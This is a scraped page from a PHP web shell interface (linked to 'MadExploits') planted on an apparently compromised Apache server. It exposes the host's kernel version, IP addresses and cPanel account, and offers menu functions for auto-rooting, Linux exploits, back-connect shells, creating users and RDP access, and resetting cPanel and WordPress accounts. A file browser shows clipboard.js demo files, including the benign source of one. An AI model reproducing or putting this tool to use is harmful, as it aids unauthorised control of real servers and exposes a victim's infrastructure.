Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.216.188.136
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
micro /
assets /
clip /
demo /
[ HOME SHELL ]
Name
Size
Permission
Action
constructor-node.html
966
B
-rw-r--r--
constructor-nodelist.html
1.03
KB
-rw-r--r--
constructor-selector.html
1.01
KB
-rw-r--r--
function-target.html
975
B
-rw-r--r--
function-text.html
941
B
-rw-r--r--
target-div.html
962
B
-rw-r--r--
target-input-number.html
895
B
-rw-r--r--
target-input.html
890
B
-rw-r--r--
target-programmatic-copy.html
724
B
-rw-r--r--
target-programmatic-cut.html
712
B
-rw-r--r--
target-textarea.html
985
B
-rw-r--r--
text-programmatic-copy.html
657
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : function-target.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <title>function-target</title> <meta name="viewport" content="width=device-width, initial-scale=1" /> </head> <body> <!-- 1. Define some markup --> <button class="btn">Copy</button> <div>hello</div> <!-- 2. Include library --> <script src="../dist/clipboard.min.js"></script> <!-- 3. Instantiate clipboard --> <script> var clipboard = new ClipboardJS('.btn', { target: function () { return document.querySelector('div'); }, }); clipboard.on('success', function (e) { console.info('Action:', e.action); console.info('Text:', e.text); console.info('Trigger:', e.trigger); }); clipboard.on('error', function (e) { console.info('Action:', e.action); console.info('Text:', e.text); console.info('Trigger:', e.trigger); }); </script> </body> </html>
Close